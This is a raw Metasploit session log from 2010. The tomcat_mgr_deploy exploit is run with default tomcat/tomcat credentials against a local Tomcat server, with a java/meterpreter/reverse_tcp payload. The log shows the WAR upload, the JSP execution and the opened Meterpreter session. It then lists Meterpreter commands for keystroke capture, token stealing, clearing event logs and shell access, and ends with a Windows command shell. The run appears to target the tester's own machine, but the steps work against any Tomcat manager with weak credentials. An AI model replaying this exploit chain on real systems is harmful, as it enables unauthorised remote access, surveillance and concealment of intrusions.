msf exploit(tomcat_mgr_deploy) > show options Module options: Name

1. msf exploit(tomcat_mgr_deploy) > show options
2.  
3. Module options:
4.  
5. Name Current Setting Required Description
6. ---- --------------- -------- -----------
7. PASSWORD tomcat no The password for the specified username
8. PATH /manager yes The URI path of the manager app (/deploy and /undeploy will be used)
9. Proxies no Use a proxy chain
10. RHOST localhost yes The target address
11. RPORT 8080 yes The target port
12. USERNAME tomcat no The username to authenticate as
13. VERBOSE false no Enable verbose output
14. VHOST no HTTP server virtual host
15.  
16.  
17. Payload options (java/shell/reverse_tcp):
18.  
19. Name Current Setting Required Description
20. ---- --------------- -------- -----------
21. LHOST 127.0.0.1 yes The listen address
22. LPORT 4444 yes The listen port
23.  
24.  
25. Exploit target:
26.  
27. Id Name
28. -- ----
29. 1 Java Universal
30.  
31.  
32. msf exploit(tomcat_mgr_deploy) > set payload java/meterpreter/reverse_tcp
33. payload => java/meterpreter/reverse_tcp
34. msf exploit(tomcat_mgr_deploy) > exploit
35.  
36. [*] Started reverse handler on 127.0.0.1:4444
37. [*] Using manually select target "Java Universal"
38. [*] SHELL set to cmd.exe
39. [*] Uploading 6309 bytes as 6uD9BUvXfIr8OfmpwRvokVMxtdpHH.war ...
40. [*] Executing /6uD9BUvXfIr8OfmpwRvokVMxtdpHH/tO3s8i.jsp...
41. [*] Undeploying 6uD9BUvXfIr8OfmpwRvokVMxtdpHH ...
42. [*] Sending stage (26938 bytes) to 127.0.0.1
43. [*] Meterpreter session 2 opened (127.0.0.1:4444 -> 127.0.0.1:11545) at 2010-10-22 23:09:00 +0100
44.  
45.  
46. meterpreter >
47. meterpreter > help
48.  
49. Core Commands
50. =============
51.  
52. Command Description
53. ------- -----------
54. ? Help menu
55. background Backgrounds the current session
56. bgkill Kills a background meterpreter script
57. bglist Lists running background scripts
58. bgrun Executes a meterpreter script as a background thread
59. channel Displays information about active channels
60. close Closes a channel
61. exit Terminate the meterpreter session
62. help Help menu
63. interact Interacts with a channel
64. irb Drop into irb scripting mode
65. migrate Migrate the server to another process
66. quit Terminate the meterpreter session
67. read Reads data from a channel
68. run Executes a meterpreter script
69. use Load a one or more meterpreter extensions
70. write Writes data to a channel
71.  
72.  
73. Stdapi: File system Commands
74. ============================
75.  
76. Command Description
77. ------- -----------
78. cat Read the contents of a file to the screen
79. cd Change directory
80. del Delete the specified file
81. download Download a file or directory
82. edit Edit a file
83. getlwd Print local working directory
84. getwd Print working directory
85. lcd Change local working directory
86. lpwd Print local working directory
87. ls List files
88. mkdir Make directory
89. pwd Print working directory
90. rm Delete the specified file
91. rmdir Remove directory
92. search Search for files
93. upload Upload a file or directory
94.  
95.  
96. Stdapi: Networking Commands
97. ===========================
98.  
99. Command Description
100. ------- -----------
101. ipconfig Display interfaces
102. portfwd Forward a local port to a remote service
103. route View and modify the routing table
104.  
105.  
106. Stdapi: System Commands
107. =======================
108.  
109. Command Description
110. ------- -----------
111. clearev Clear the event log
112. drop_token Relinquishes any active impersonation token.
113. execute Execute a command
114. getpid Get the current process identifier
115. getprivs Get as many privileges as possible
116. getuid Get the user that the server is running as
117. kill Terminate a process
118. ps List running processes
119. reboot Reboots the remote computer
120. reg Modify and interact with the remote registry
121. rev2self Calls RevertToSelf() on the remote machine
122. shell Drop into a system command shell
123. shutdown Shuts down the remote computer
124. steal_token Attempts to steal an impersonation token from the target process
125. sysinfo Gets information about the remote system, such as OS
126.  
127.  
128. Stdapi: User interface Commands
129. ===============================
130.  
131. Command Description
132. ------- -----------
133. enumdesktops List all accessible desktops and window stations
134. getdesktop Get the current meterpreter desktop
135. idletime Returns the number of seconds the remote user has been idle
136. keyscan_dump Dump the keystroke buffer
137. keyscan_start Start capturing keystrokes
138. keyscan_stop Stop capturing keystrokes
139. screenshot Grab a screenshot of the interactive desktop
140. setdesktop Change the meterpreters current desktop
141. uictl Control some of the user interface components
142.  
143. meterpreter > cat ...
144. Unknown request detected:
145. TLV_TYPE_METHOD = stdapi_railgun_api
146. TLV_TYPE_REQUEST_ID = 56807978639825980098238633155564
147. 0x24E21 = 0
148. 0x44E22 = (raw data, 0 bytes)
149. 0x44E23 = (raw data, 0 bytes)
150. 0x44E24 = (raw data, 0 bytes)
151. 0x14E29 = shell32
152. 0x14E2A = IsUserAnAdmin
153. meterpreter > shell
154. Process 1 created.
155. Channel 2 created.
156. Microsoft Windows XP [Version 5.1.2600]
157. (C) Copyright 1985-2001 Microsoft Corp.
158.  
159. D:\Progs-Michi\apache-tomcat-6.0.26\bin>exit
160. meterpreter >